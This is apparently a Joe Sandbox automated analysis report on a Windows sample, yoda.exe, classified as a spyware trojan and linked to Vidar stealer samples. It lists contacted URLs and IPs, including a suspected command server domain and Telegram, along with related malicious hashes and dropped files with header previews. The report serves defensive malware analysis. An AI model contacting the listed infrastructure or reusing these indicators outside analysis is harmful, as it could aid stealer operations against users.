                                                                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesIceland.com, 0000000A.00000002.2868129868.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, HVAI5F.10.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://clients4.google.com/chrome-syncchrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://unisolated.invalid/achrome.exe, 0000000F.00000002.2217337654.00000278009C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/6692chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://issuetracker.google.com/258207403chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://anglebug.com/3502chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://anglebug.com/3623chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://anglebug.com/3625chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://anglebug.com/3624chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://docs.google.com/presentation/Jchrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://t.mIceland.com, 0000000A.00000003.1949840536.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1949809935.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950065296.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950117154.0000000000EEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/5007chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216326233.00000278006F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 0000000F.00000002.2214915433.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2145015465.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2143157721.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141719403.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149899649.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2146745669.000002780033C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://anglebug.com/3862chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                              		unknownReserved
                                                                                                                                                                                                              		unknownunknownfalse
                                                                                                                                                                                                              172.217.21.36
                                                                                                                                                                                                              		www.google.comUnited States
                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                              188.245.216.205
                                                                                                                                                                                                              		bijutr.shopIran (ISLAMIC Republic Of)
                                                                                                                                                                                                              		16322PARSONLINETehran-IRANIRfalse
                                                                                                                                                                                                              149.154.167.99
                                                                                                                                                                                                              		t.meUnited Kingdom
                                                                                                                                                                                                              		62041TELEGRAMRUfalse

                                                                                                                                                                                                              Private

                                                                                                                                                                                                              IP
                                                                                                                                                                                                              192.168.2.4
                                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1581176
                                                                                                                                                                                                              Start date and time:2024-12-27 07:08:05 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 7m 34s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:22
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:yoda.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@43/47@5/6
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              • Number of executed functions: 75
                                                                                                                                                                                                              • Number of non-executed functions: 301
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 217.20.58.100, 192.229.221.95, 172.217.19.227, 172.217.19.238, 64.233.161.84, 172.217.17.46, 142.250.181.99, 4.245.163.56, 23.218.208.109, 13.107.246.63
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              01:09:06API Interceptor1x Sleep call for process: yoda.exe modified

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              239.255.255.250lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                  invoice PU-LG.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    http://kxyaiaqyijjz.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      http://tubnzy3uvz.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        http://auth-owlting.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              https://contractnerds.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                http://vanessa.nilsson@dmava.nj.govGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  188.245.216.205lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                        ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                          http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • telegram.org/
                                                                                                                                                                                                                                          http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                          http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • telegram.org/
                                                                                                                                                                                                                                          http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • telegram.org/
                                                                                                                                                                                                                                          http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • telegram.org/?setln=pl
                                                                                                                                                                                                                                          http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • telegram.org/
                                                                                                                                                                                                                                          http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • telegram.dog/
                                                                                                                                                                                                                                          LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                          • t.me/cinoshibot
                                                                                                                                                                                                                                          jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                          • t.me/cinoshibot

                                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          t.melem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          bijutr.shoplem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 188.245.216.205

                                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          TELEGRAMRUlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                          HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                          PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                          Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                          Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                          Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                          PARSONLINETehran-IRANIRlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                          • 5.78.169.145
                                                                                                                                                                                                                                          ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                          • 5.78.22.227
                                                                                                                                                                                                                                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                          • 46.62.209.95
                                                                                                                                                                                                                                          ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 188.245.211.225
                                                                                                                                                                                                                                          tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 188.245.211.225
                                                                                                                                                                                                                                          m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 188.245.52.94

                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          libcurl.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          b8ygJBG5cb.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                          • 188.245.216.205

                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          C:\ProgramData\4EK6XL68GLNY\2NG4E3lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        fim3BhyKXP.gifGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          TMX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, VidarBrowse

                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\2NG4E3

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):24008
                                                                                                                                                                                                                                                              Entropy (8bit):6.062446965815151
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                                                                                                                                                                                                              MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                                                                                                                                                                                                              SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                                                                                                                                                                                                              SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                                                                                                                                                                                                              SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                              • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: script.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Setup.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: nB52P46OJD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: xoJxSAotVM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: fim3BhyKXP.gif, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: TMX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q..Q..Q..E...S..E...]..Q..t..E...Z..E...P..E...S..E.S.P..E...P..RichQ..................PE..d....Q.!..........",.........$......................................................Bn....`A.........................................<..X....<..x....p..(....`..h....<...!......(....8..T............................0..............(1..0............................text...p........................... ..`.rdata..>....0......................@..@.data...`....P.......0..............@....pdata..h....`.......2..............@..@.rsrc...(....p.......4..............@..@.reloc..(............:..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\5PZUK6

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\7GDT2N

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):10219
                                                                                                                                                                                                                                                              Entropy (8bit):4.966520026409024
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:NPgBOOzJMk67cY82SGrPVYRjDjXK2F6KJzLLwGXtXqWgrjj31jj6OzJMk67cY82s:UYwP62I+Wr3JjkwP62I+Ws
                                                                                                                                                                                                                                                              MD5:381138FA1B1C4C298AD2441898677ED6
                                                                                                                                                                                                                                                              SHA1:B8A0B0ECAAF6F3BBD7C27DD54ACD4BC3366DD0A4
                                                                                                                                                                                                                                                              SHA-256:D4EE07BC2183E3D013B68B080B9E2F603676B27F8B0C95CCA2ED533BC671FAFA
                                                                                                                                                                                                                                                              SHA-512:095C2B1C129C36125FE17ED096FDE58AE0F8AF61527D9AEDCAB379C3221BF09D87F28846E6FA3CF9FE05C750689A2ADFCDD1AB67409780A12A425A33219858EC
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. <assemblyIdentity.. buildType="release".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI-Component".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. optimizePatterns="no".. offlineApply="no".. replacementSettingsVersionRange="0".. replacementVersionRange="6.2-10.0".. scope="MigWiz,Upgrade".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. Downlevel settings -->.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultUserName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultDomainName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsof

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\7QQ1N7

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):889
                                                                                                                                                                                                                                                              Entropy (8bit):5.016955029110262
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:p/o2e8ZR+Vj3Xg0cjAkt3QbENgwnwJXMFhUK:22e8v+VrgfAbIggwJuX
                                                                                                                                                                                                                                                              MD5:2948FF1C0804EC7DB473BB77EB3FBE4E
                                                                                                                                                                                                                                                              SHA1:98A97AFC0E4E2B09A17AA0746F455DFD24356357
                                                                                                                                                                                                                                                              SHA-256:2F6B99F5915A462CAFF60950839E1498F12C9F8194DB3DA02251C5BD2CAD700E
                                                                                                                                                                                                                                                              SHA-512:8393B3AE7D44A4DD85D05D48768F9123910E603C477A3CACC6BF12D03D464959EC01A293B0B3317B0F8470A76D71F695098AE211DD6200D8F7F21E1C757F4EDA
                                                                                                                                                                                                                                                              Malicious:false
